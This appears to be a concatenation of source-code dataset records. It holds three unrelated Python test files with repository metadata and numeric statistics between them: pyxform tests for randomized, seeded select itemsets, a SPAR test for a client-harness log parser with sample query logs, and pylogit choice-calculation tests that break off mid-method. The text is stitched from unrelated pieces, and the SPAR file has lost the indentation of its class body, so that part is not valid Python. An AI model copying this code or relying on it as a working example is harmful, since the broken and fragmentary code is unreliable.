pyxform/tests_v1/test_randomize_itemsets.py
|
PMA-2020/pmaxform3
|
9d36f97f25cb09f0fb8aafb69370454731ecbbd5
|
[
"BSD-2-Clause"
] | 1
|
2022-03-16T13:48:25.000Z
|
2022-03-17T07:33:15.000Z
|
pyxform/tests_v1/test_randomize_itemsets.py
|
PMA-2020/pmaxform3
|
9d36f97f25cb09f0fb8aafb69370454731ecbbd5
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Test randomize itemsets.
"""
from pyxform.tests_v1.pyxform_test_case import PyxformTestCase
class RandomizeItemsetsTest(PyxformTestCase):
    """Tests for the randomize/seed parameters on itemset-based selects.

    Each test feeds an XLSForm (as a markdown table) to assertPyxformXform
    and checks either that the generated XForm wraps the itemset nodeset in
    randomize(...) or that the expected validation error is reported.
    """

    def test_randomized_select_one(self):
        """randomize=true wraps a select_one itemset in randomize()."""
        self.assertPyxformXform(
            name="data",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one choices | select | Select| randomize=true |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('choices')/root/item)\">"
            ],
        )

    def test_randomized_seeded_select_one(self):
        """A numeric seed is passed as the second randomize() argument."""
        self.assertPyxformXform(
            name="data",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one choices | select | Select| randomize=true, seed=42 |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('choices')/root/item, 42)\">"
            ],
        )

    def test_randomized_seeded_select_one_nameset_seed(self):
        """A ${field} seed reference becomes an XPath to that field."""
        self.assertPyxformXform(
            name="data",
            md="""
            | survey | | | | | |
            | | type | name | label | parameters | calculation |
            | | calculate | seed | | | once(decimal-date-time(now())) |
            | | select_one choices | select | Select| randomize=true,seed=${seed} | |
            | choices| | | | | |
            | | list_name | name | label | | |
            | | choices | a | opt_a | | |
            | | choices | b | opt_b | | |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('choices')/root/item, /data/seed)\">"
            ],
        )

    def test_randomized_seeded_filtered_select_one(self):
        """A choice_filter predicate is kept inside the randomize() call."""
        self.assertPyxformXform(
            name="data",
            md="""
            | survey | | | | | |
            | | type | name | label | parameters | choice_filter |
            | | select_one choices | select | Select| randomize=true, seed=42 | name='a' |
            | choices| | | | | |
            | | list_name | name | label | | |
            | | choices | a | opt_a | | |
            | | choices | b | opt_b | | |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('choices')/root/item[name='a'], 42)\">"
            ],
        )

    def test_randomized_select_multiple(self):
        """randomize=true also applies to select_multiple itemsets."""
        self.assertPyxformXform(
            name="data",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_multiple choices | select | Select| randomize=true |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('choices')/root/item)\">"
            ],
        )

    def test_randomized_seeded_select_multiple(self):
        """Seeded randomize on a select_multiple itemset."""
        self.assertPyxformXform(
            name="data",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_multiple choices | select | Select| randomize=true, seed=42 |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('choices')/root/item, 42)\">"
            ],
        )

    def test_randomized_external_xml_instance(self):
        """randomize=true works with select_one_from_file external XML."""
        self.assertPyxformXform(
            name="ecsv",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one_from_file cities.xml | city | City | randomize=true |
            """,
            xml__contains=[
                "<itemset nodeset=\"randomize(instance('cities')/root/item)\">"
            ],
        )

    def test_randomized_select_one_bad_param(self):
        """An unknown parameter name is rejected with a clear error."""
        self.assertPyxformXform(
            name="data",
            errored="true",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one choices | select | Select| step=10 |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            error__contains=[
                "Accepted parameters are 'randomize, seed': 'step' is an invalid parameter."
            ],
        )

    def test_randomized_select_one_bad_randomize(self):
        """randomize only accepts true or false."""
        self.assertPyxformXform(
            name="data",
            errored="true",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one choices | select | Select| randomize=ukanga |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            error__contains=[
                "randomize must be set to true or false: 'ukanga' is an invalid value"
            ],
        )

    def test_randomized_select_one_bad_seed(self):
        """seed must be a number or a ${field} reference."""
        self.assertPyxformXform(
            name="data",
            errored="true",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one choices | select | Select| randomize=true, seed=ukanga |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            error__contains=[
                "seed value must be a number or a reference to another field."
            ],
        )

    def test_randomized_select_one_seed_without_randomize(self):
        """A seed without randomize=true is rejected."""
        self.assertPyxformXform(
            name="data",
            errored="true",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | select_one choices | select | Select| seed=42 |
            | choices| | | | |
            | | list_name | name | label | |
            | | choices | a | opt_a | |
            | | choices | b | opt_b | |
            """,
            error__contains=["Parameters must include randomize=true to use a seed."],
        )
| 50.019512
| 125
| 0.302906
| 573
| 10,254
| 5.212914
| 0.153578
| 0.063274
| 0.062605
| 0.110479
| 0.804151
| 0.787077
| 0.73619
| 0.73619
| 0.707734
| 0.691999
| 0
| 0.004465
| 0.606885
| 10,254
| 204
| 126
| 50.264706
| 0.736542
| 0.004584
| 0
| 0.740113
| 0
| 0.00565
| 0.734288
| 0.005589
| 0
| 0
| 0
| 0
| 0.062147
| 1
| 0.062147
| false
| 0
| 0.00565
| 0
| 0.073446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1c520abe54f5d75ef1ea1dbc65fc919bc36d827b
| 21,193
|
py
|
Python
|
spar_python/analytics/ta1/parse_client_harness_log_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 37
|
2017-06-09T13:55:23.000Z
|
2022-01-28T12:51:17.000Z
|
spar_python/analytics/ta1/parse_client_harness_log_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | null | null | null |
spar_python/analytics/ta1/parse_client_harness_log_test.py
|
nathanawmk/SPARTA
|
6eeb28b2dd147088b6e851876b36eeba3e700f16
|
[
"BSD-2-Clause"
] | 5
|
2017-06-09T13:55:26.000Z
|
2021-11-11T03:51:56.000Z
|
# *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: Tim Meunier
# Description: Unit tests for the perfomer queries log file
# parser
# *****************************************************************
import unittest
import StringIO
import os
import sys
this_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = os.path.join(this_dir, '..', '..', '..')
sys.path.append(base_dir)
import spar_python.report_generation.ta1.ta1_schema as ta1_schema
import spar_python.analytics.ta1.parse_client_harness_log as parse_client_harness
import spar_python.analytics.common.log_parser_util as log_parser_util
class ParsePerfLogTest(unittest.TestCase):
"""Test performer queries log parser"""
maxDiff = None
# command id 33-1
gold_query1 = {ta1_schema.DBP_PERFORMERNAME: 'IBM',
ta1_schema.DBP_FQID : 2384,
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_QUERYLATENCY : repr(0.10711013292893767),
ta1_schema.DBP_EVENTMSGTIMES : [],
ta1_schema.DBP_EVENTMSGIDS : [],
ta1_schema.DBP_EVENTMSGVALS : [],
ta1_schema.DBP_RESULTSTIME : repr(3305997.545109896),
ta1_schema.DBP_SENDTIME : repr(3305997.437999763),
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDHASHES : [],
ta1_schema.DBP_RETURNEDRECORDIDS :
[ '42825118908495',
'44435731644979',
'95438468284621',
'171815871709769',
'178893977813230',
'205058918580953',
'273198574731828',
'279383327637992',
'318944271401057',
'348897373323835',
'349017632408193',
'380267814454218',
'386091790107092',
'404590214250850',
'410555923825061',
'416371309544263',
'425210352239438',
'425738633216567'],
ta1_schema.DBP_SELECTIONCOLS : 'id',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# command id 36-4
gold_query2 = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 90,
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_QUERYLATENCY : repr(670.1062920428813),
ta1_schema.DBP_EVENTMSGTIMES : [],
ta1_schema.DBP_EVENTMSGIDS : [],
ta1_schema.DBP_EVENTMSGVALS : [],
ta1_schema.DBP_RESULTSTIME : repr(3306667.545109896),
ta1_schema.DBP_SENDTIME : repr(3305997.438817853),
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDHASHES : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['123', '456', '789'],
ta1_schema.DBP_SELECTIONCOLS : 'id, data',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# command id 35-3
gold_query3 = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 28,
ta1_schema.DBP_QUERYLATENCY : repr(553.1068647759967),
ta1_schema.DBP_EVENTMSGTIMES : [],
ta1_schema.DBP_EVENTMSGIDS : [],
ta1_schema.DBP_EVENTMSGVALS : [],
ta1_schema.DBP_RESULTSTIME : repr(3306550.545432123),
ta1_schema.DBP_SENDTIME : repr(3305997.438567347),
ta1_schema.DBP_STATUS : ['FAILED', 'Some', 'failure',
'results', 'FAILED', 'Second',
'failure', 'results'],
ta1_schema.DBP_RETURNEDRECORDHASHES : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['111111111111111',
'555555555555555',
'999999999999999'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : 'id',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# command id 34-2
gold_query4 = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_EVENTMSGTIMES : ['3305997.438667347',
'3305997.448667347',
'3305997.545209896',
'3306555.545432123',
'3306667.545209896',
'3306668.545209896'],
ta1_schema.DBP_EVENTMSGIDS : ['1', '2', '3', '4', '5', '6'],
ta1_schema.DBP_EVENTMSGVALS : ['', '22', '', '44', '', ''],
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_RETURNEDRECORDHASHES :
['ffffffffffffffffffff',
'3a677e6490ff058c492d',
'55f729ab502948d9375c'],
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['13857229552',
'487575939385',
'677029582263'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# copy of command id 34-2
gold_mod_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_EVENTMSGTIMES : ['3305997.438667347',
'3305997.448667347',
'3305997.545209896',
'3306555.545432123',
'3306667.545209896',
'3306668.545209896'],
ta1_schema.DBP_EVENTMSGIDS : ['1', '2', '3', '4', '5', '6'],
ta1_schema.DBP_EVENTMSGVALS : ['', '22', '', '44', '', ''],
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_RETURNEDRECORDHASHES :
['ffffffffffffffffffff',
'3a677e6490ff058c492d',
'55f729ab502948d9375c'],
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['13857229552',
'487575939385',
'677029582263'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*',
ta1_schema.DBP_ISMODIFICATIONQUERY : 1,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 0}
# copy of command id 34-2
gold_tp_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_EVENTMSGTIMES : ['3305997.438667347',
'3305997.448667347',
'3305997.545209896',
'3306555.545432123',
'3306667.545209896',
'3306668.545209896'],
ta1_schema.DBP_EVENTMSGIDS : ['1', '2', '3', '4', '5', '6'],
ta1_schema.DBP_EVENTMSGVALS : ['', '22', '', '44', '', ''],
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_RETURNEDRECORDHASHES :
['ffffffffffffffffffff',
'3a677e6490ff058c492d',
'55f729ab502948d9375c'],
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_RETURNEDRECORDIDS : ['13857229552',
'487575939385',
'677029582263'],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*',
ta1_schema.DBP_ISMODIFICATIONQUERY : 0,
ta1_schema.DBP_ISTHROUGHPUTQUERY : 1}
gold_log = """[2936548.490002438] 2013-05-30 13:34:43 IBM-dbname-001_something_something
[2936548.490002438] Invoked from /home/lincoln/spar-testing/bin/
[2936548.490002438] NOTE: ID x-y QID z = x-globalID, y-localID, z-resultsDBQueryID
[3305996.925772338] VariableDelayQueryRunner queries/10T/p3-notes3.sql 1 NO_DELAY
[3305997.437652770] EPOCH_TIME: 1305997.437652770
[3305997.437999763] ID 33-1 sent
[3305997.438091660] ID 33-1 QID 2384: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'tourments')]]
[3305997.438119056] ID 34-2 QID 5847: [[SELECT * FROM main WHERE CONTAINED_IN(notes3, 'erit')]]
[3305997.438120347] ID 34-2 event 0 occurred
[3305997.438122770] EPOCH_TIME: 1305997.438122770
[3305997.438141846] ID 35-3 QID 28: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'nehmen')]]
[3305997.438163889] ID 36-4 QID 90: [[SELECT id, data FROM main WHERE CONTAINED_IN(notes3, 'l\'ennemi')]]
[3305997.438331404] ID 34-2 sent
[3305997.438567347] ID 35-3 sent
[3305997.438667347] ID 34-2 event 1 occurred
[3305997.438817853] ID 36-4 sent
[3305997.448667347] ID 34-2 event 2 with value [[22]] occurred
[3305997.545109896] ID 33-1 results:
380267814454218
95438468284621
44435731644979
42825118908495
205058918580953
404590214250850
348897373323835
[3305997.545209896] ID 34-2 event 3 occurred
349017632408193
279383327637992
178893977813230
425210352239438
318944271401057
425738633216567
416371309544263
171815871709769
273198574731828
410555923825061
386091790107092
[3306550.545432123] ID 35-3 results:
111111111111111
FAILED
Some
failure
results
ENDFAILED
555555555555555
FAILED
Second
failure
[3306555.545432123] ID 34-2 event 4 with value [[44]] occurred
results
ENDFAILED
999999999999999
[3306667.545209896] ID 34-2 event 5 occurred
[3306667.545109896] ID 36-4 results:
123
456
789
[3306667.999999999] ID 34-2 results:
677029582263 55f729ab502948d9375c
487575939385 3a677e6490ff058c492d
13857229552 ffffffffffffffffffff
[3306668.545209896] ID 34-2 event 6 occurred
[3306669.545209896] ID 99-9 event 6 occurred
[3306669.545209897] END_OF_LOG
"""
gold_log_abort = """[2936548.490002438] 2013-05-30 13:34:43 IBM-dbname-001_something_something
[2936548.490002438] Invoked from /home/lincoln/spar-testing/bin/
[2936548.490002438] NOTE: ID x-y QID z = x-globalID, y-localID, z-resultsDBQueryID
[3305996.925772338] VariableDelayQueryRunner queries/10T/p3-notes3.sql 1 NO_DELAY
[3305997.437652770] EPOCH_TIME: 1305997.437652770
[3305997.437999763] ID 33-1 sent
[3305997.438091660] ID 33-1 QID 2384: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'tourments')]]
[3305997.438119056] ID 34-2 QID 5847: [[SELECT * FROM main WHERE CONTAINED_IN(notes3, 'erit')]]
[3305997.438120347] ID 34-2 event 0 occurred
[3305997.438122770] EPOCH_TIME: 1305997.438122770
[3305997.438141846] ID 35-3 QID 28: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'nehmen')]]
[3305997.438163889] ID 36-4 QID 90: [[SELECT id, data FROM main WHERE CONTAINED_IN(notes3, 'l\'ennemi')]]
[3305997.438331404] ID 34-2 sent
[3305997.438567347] ID 35-3 sent
[3305997.438667347] ID 34-2 event 1 occurred
[3305997.438817853] ID 36-4 sent
[3305997.448667347] ID 34-2 event 2 with value [[22]] occurred
[3305997.545109896] ID 33-1 results:
380267814454218
95438468284621
44435731644979
42825118908495
205058918580953
404590214250850
348897373323835
[3305997.545209896] ID 34-2 event 3 occurred
349017632408193
279383327637992
178893977813230
425210352239438
318944271401057
425738633216567
416371309544263
171815871709769
273198574731828
410555923825061
386091790107092
[3306550.545432123] ID 35-3 results:
111111111111111
FAILED
Some
failure
results
ENDFAILED
555555555555555
FAILED
Second
failure
[3306555.545432123] ID 34-2 event 4 with value [[44]] occurred
results
ENDFAILED
999999999999999
[3306667.545209896] ID 34-2 event 5 occurred
[3306667.545109896] ID 36-4 results:
123
456
789
[3306667.999999999] ID 34-2 results:
677029582263 55f729ab502948d9375c
487575939385 3a677e6490ff058c492d
13857229552 ffffffffffffffffffff
[3306668.545209896] ID 34-2 event 6 occurred
[3306669.545209896] ID 99-9 event 6 occurred
[3306670.437999763] ID 39-1 sent
[3306670.438091660] ID 39-1 QID 1123: [[SELECT id FROM main WHERE CONTAINED_IN(notes3, 'basketball')]]
[3306670.545109896] ID 39-1 results:
425210352239438
318944271401057
425738633216567
416371309544263
171815871709769
"""
def _ut_record_func(self, query_info, command_id, results_db):
"""Test function to fake writing of data to a DB"""
if (command_id == "33-1"):
self.assertEqual(query_info, self.gold_query1)
elif (command_id == "36-4"):
self.assertEqual(query_info, self.gold_query2)
# FAILED query test
elif (command_id == "35-3"):
self.assertEqual(query_info, self.gold_query3)
# Query with hashes in results and select * and events
elif (command_id == "34-2"):
self.assertEqual(query_info, self.gold_query4)
# Test for process_query()
elif (command_id == '10-1'):
self.assertEqual(query_info, self.gold_query4)
# Test modification query for process_query()
elif (command_id == '10-2'):
self.assertEqual(query_info, self.gold_mod_query)
# Test throughput query for process_query()
elif (command_id == '10-3'):
self.assertEqual(query_info, self.gold_tp_query)
else:
self.failureException('Unexpected command_id found')
return 1
def test_parse_queries(self):
"""Test parsing logfile and generating query dict in memory"""
gold_records = 4
log_parser = log_parser_util.LogParserUtil()
test_log = StringIO.StringIO(self.gold_log)
flags = {'mod' : False, 'throughput' : False, 'baseline' : False }
(ut_records, unused_baseline_matches) = \
parse_client_harness.parse_queries(log_parser,
test_log,
self._ut_record_func,
None, flags)
self.assertEqual(ut_records, gold_records)
def test_parse_queries_abort(self):
"""Test parsing logfile and generating query dict in memory"""
gold_records = 5
log_parser = log_parser_util.LogParserUtil()
test_log = StringIO.StringIO(self.gold_log_abort)
flags = {'mod' : False, 'throughput' : False, 'baseline' : False }
(ut_records, unused_baseline_matches) = \
parse_client_harness.parse_queries(log_parser,
test_log,
self._ut_record_func,
None, flags)
self.assertEqual(ut_records, gold_records)
def test_process_matches(self):
"""Test conversion of matches hash to two lists. One of ids, one of
hashes sorted by ids"""
with_hashes = {555555555 : 'aaaaaaaaa',
999999999 : '000000000',
111111111 : 'fffffffff'}
no_hashes = {555555555 : '',
999999999 : '',
111111111 : ''}
gold_ids = ['111111111', '555555555', '999999999']
gold_hashes = ['fffffffff', 'aaaaaaaaa', '000000000']
# Test with hashes
(test_ids, test_hashes) = \
parse_client_harness.process_matches(with_hashes)
self.assertEqual(test_ids, gold_ids)
self.assertEqual(test_hashes, gold_hashes)
# Test without hashes
(test_ids, test_hashes) = \
parse_client_harness.process_matches(no_hashes)
self.assertEqual(test_ids, gold_ids)
self.assertEqual(test_hashes, [])
def test_process_query(self):
"""Test preparation of a query that has results for insertion
into the DB."""
# Based on global gold_query4
test_matches = {'13857229552' : 'ffffffffffffffffffff',
'487575939385' : '3a677e6490ff058c492d',
'677029582263' : '55f729ab502948d9375c'}
test_events = {'3305997.438667347' : ['1', ''],
'3305997.448667347' : ['2', '22'],
'3305997.545209896' : ['3', ''],
'3306555.545432123' : ['4', '44'],
'3306667.545209896' : ['5', ''],
'3306668.545209896' : ['6', '']}
good_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 5847,
ta1_schema.DBP_QUERYLATENCY : repr(670.5616685952991),
ta1_schema.DBP_RESULTSTIME : repr(3306667.999999999),
ta1_schema.DBP_SENDTIME : repr(3305997.438331404),
ta1_schema.DBP_STATUS : [],
ta1_schema.DBP_TESTCASEID : '001',
ta1_schema.DBP_SELECTIONCOLS : '*'}
bad_query = {ta1_schema.DBP_PERFORMERNAME : 'IBM',
ta1_schema.DBP_FQID : 28,
ta1_schema.DBP_QUERYLATENCY : repr(553.1068647759967),
ta1_schema.DBP_RESULTSTIME : repr(3306550.545432123),
ta1_schema.DBP_SENDTIME : repr(3305997.438567347),
ta1_schema.DBP_STATUS : ['FAILED', 'Some', 'failure',
'results'],
ta1_schema.DBP_TESTCASEID : '001'}
log_parser = log_parser_util.LogParserUtil()
flags = {'mod' : False, 'throughput' : False, 'baseline' : False}
ret = parse_client_harness.process_query(log_parser, good_query, \
'10-1', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertTrue(ret)
ret = parse_client_harness.process_query(log_parser, bad_query, \
'10-1', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertFalse(ret)
good_query[ta1_schema.DBP_ISMODIFICATIONQUERY] = 1
flags['mod'] = True
ret = parse_client_harness.process_query(log_parser, good_query, \
'10-2', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertTrue(ret)
good_query[ta1_schema.DBP_ISMODIFICATIONQUERY] = 0
good_query[ta1_schema.DBP_ISTHROUGHPUTQUERY] = 1
flags['mod'] = False
flags['throughput'] = True
ret = parse_client_harness.process_query(log_parser, good_query, \
'10-3', test_matches, \
test_events, None, \
self._ut_record_func, flags)
self.assertTrue(ret)
| 46.887168
| 105
| 0.544755
| 1,958
| 21,193
| 5.678754
| 0.14811
| 0.089037
| 0.116557
| 0.012591
| 0.809425
| 0.791888
| 0.784963
| 0.751327
| 0.724795
| 0.710136
| 0
| 0.278065
| 0.36026
| 21,193
| 451
| 106
| 46.991131
| 0.542042
| 0.049026
| 0
| 0.701493
| 0
| 0.027363
| 0.289926
| 0.011354
| 0
| 0
| 0
| 0
| 0.042289
| 1
| 0.012438
| false
| 0
| 0.017413
| 0
| 0.057214
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c864e7f6f31ad2a4384b0778ab51ac0cafa7e85
| 81,242
|
py
|
Python
|
tests/test_choice_calcs.py
|
bouzaghrane/pylogit
|
f83b0fd6debaa7358d87c3828428f6d4ead71357
|
[
"BSD-3-Clause"
] | 1
|
2020-06-01T07:47:12.000Z
|
2020-06-01T07:47:12.000Z
|
tests/test_choice_calcs.py
|
pabloguarda/pylogit
|
f83b0fd6debaa7358d87c3828428f6d4ead71357
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_choice_calcs.py
|
pabloguarda/pylogit
|
f83b0fd6debaa7358d87c3828428f6d4ead71357
|
[
"BSD-3-Clause"
] | 2
|
2021-07-18T02:59:54.000Z
|
2022-03-14T20:32:41.000Z
|
"""
Tests for the choice_calcs.py file.
"""
import unittest
import warnings
from collections import OrderedDict
import numpy as np
import numpy.testing as npt
import pandas as pd
from scipy.sparse import csr_matrix
from scipy.sparse import diags
from scipy.sparse import block_diag
import pylogit.asym_logit as asym
import pylogit.conditional_logit as mnl
import pylogit.choice_calcs as cc
# Convert numpy floating-point errors (overflow, invalid, etc.) into warnings,
# and make Python emit every warning occurrence instead of deduplicating them.
np.seterr(all='warn')
warnings.simplefilter("always")
class GenericTestCase(unittest.TestCase):
    """
    Defines the common setUp method used for the different type of tests.

    The fixture holds two choice situations (the first with three
    alternatives, the second with two), one generic variable, two
    alternative-specific constants, and two estimated shape parameters.
    """
    def setUp(self):
        # The set up being used is one where there are two choice situations,
        # The first having three alternatives, and the second having only two
        # alternatives. There is one generic variable. Two alternative
        # specific constants and all three shape parameters are used.
        # Create the betas to be used during the tests
        self.fake_betas = np.array([-0.6])
        # Create the fake outside intercepts to be used during the tests
        self.fake_intercepts = np.array([1, 0.5])
        # Create names for the intercept parameters
        self.fake_intercept_names = ["ASC 1", "ASC 2"]
        # Record the position of the intercept that is not being estimated
        self.fake_intercept_ref_pos = 2
        # Create the shape parameters to be used during the tests. Note that
        # these are the reparameterized shape parameters, thus they will be
        # exponentiated in the fit_mle process and various calculations.
        self.fake_shapes = np.array([-1, 1])
        # Create names for the shape parameters
        self.fake_shape_names = ["Shape 1", "Shape 2"]
        # Record the position of the shape parameter that is being constrained
        self.fake_shape_ref_pos = 2
        # Calculate the 'natural' shape parameters
        self.natural_shapes = asym._convert_eta_to_c(self.fake_shapes,
                                                     self.fake_shape_ref_pos)
        # Create an array of all model parameters
        self.fake_all_params = np.concatenate((self.fake_shapes,
                                               self.fake_intercepts,
                                               self.fake_betas))
        # The mapping between rows and alternatives is given below.
        self.fake_rows_to_alts = csr_matrix(np.array([[1, 0, 0],
                                                      [0, 1, 0],
                                                      [0, 0, 1],
                                                      [1, 0, 0],
                                                      [0, 0, 1]]))
        # Create the mapping between rows and individuals
        self.fake_rows_to_obs = csr_matrix(np.array([[1, 0],
                                                     [1, 0],
                                                     [1, 0],
                                                     [0, 1],
                                                     [0, 1]]))
        # Create the fake design matrix with columns denoting X
        # The intercepts are not included because they are kept outside the
        # index in the scobit model.
        self.fake_design = np.array([[1],
                                     [2],
                                     [3],
                                     [1.5],
                                     [3.5]])
        # Create the index array (design * betas) for these choice situations
        self.fake_index = self.fake_design.dot(self.fake_betas)
        # Create the needed dataframe for the Asymmetric Logit constructor
        self.fake_df = pd.DataFrame({"obs_id": [1, 1, 1, 2, 2],
                                     "alt_id": [1, 2, 3, 1, 3],
                                     "choice": [0, 1, 0, 0, 1],
                                     "x": self.fake_design[:, 0],
                                     "intercept": [1 for i in range(5)]})
        # Record the various column names
        self.alt_id_col = "alt_id"
        self.obs_id_col = "obs_id"
        self.choice_col = "choice"
        # Store the choices as their own array
        self.choice_array = self.fake_df[self.choice_col].values
        # Create the index specification and name dictionary for the model
        self.fake_specification = OrderedDict()
        self.fake_names = OrderedDict()
        self.fake_specification["x"] = [[1, 2, 3]]
        self.fake_names["x"] = ["x (generic coefficient)"]
        # Bundle args and kwargs used to construct the Asymmetric Logit model.
        self.constructor_args = [self.fake_df,
                                 self.alt_id_col,
                                 self.obs_id_col,
                                 self.choice_col,
                                 self.fake_specification]
        # Create a variable for the kwargs being passed to the constructor
        self.constructor_kwargs = {"intercept_ref_pos":
                                   self.fake_intercept_ref_pos,
                                   "shape_ref_pos": self.fake_shape_ref_pos,
                                   "names": self.fake_names,
                                   "intercept_names":
                                   self.fake_intercept_names,
                                   "shape_names": self.fake_shape_names}
        # Initialize a basic Asymmetric Logit model whose coefficients will be
        # estimated.
        self.model_obj = asym.MNAL(*self.constructor_args,
                                   **self.constructor_kwargs)
        # Store a ridge penalty for use in calculations.
        self.ridge = 0.5
        return None
class ComputationalTests(GenericTestCase):
"""
Tests the computational functions to make sure that they return the
expected results.
"""
# Store a utility transformation function for the tests
def utility_transform(self,
sys_utilities,
alt_IDs,
rows_to_alts,
shape_params,
intercept_params):
return sys_utilities[:, None]
def test_calc_asymptotic_covariance(self):
"""
Ensure that the correct Huber-White covariance matrix is calculated.
"""
ones_array = np.ones(5)
# Create the hessian matrix for testing. It will be a 5 by 5 matrix.
test_hessian = np.diag(2 * ones_array)
# Create the approximation of the Fisher Information Matrix
test_fisher_matrix = np.diag(ones_array)
# Create the inverse of the hessian matrix.
test_hess_inverse = np.diag(0.5 * ones_array)
# Calculated the expected result
expected_result = np.dot(test_hess_inverse,
np.dot(test_fisher_matrix, test_hess_inverse))
# Alias the function being tested
func = cc.calc_asymptotic_covariance
# Perform the test.
function_results = func(test_hessian, test_fisher_matrix)
self.assertIsInstance(function_results, np.ndarray)
self.assertEqual(function_results.shape, test_hessian.shape)
npt.assert_allclose(expected_result, function_results)
return None
    def test_log_likelihood(self):
        """
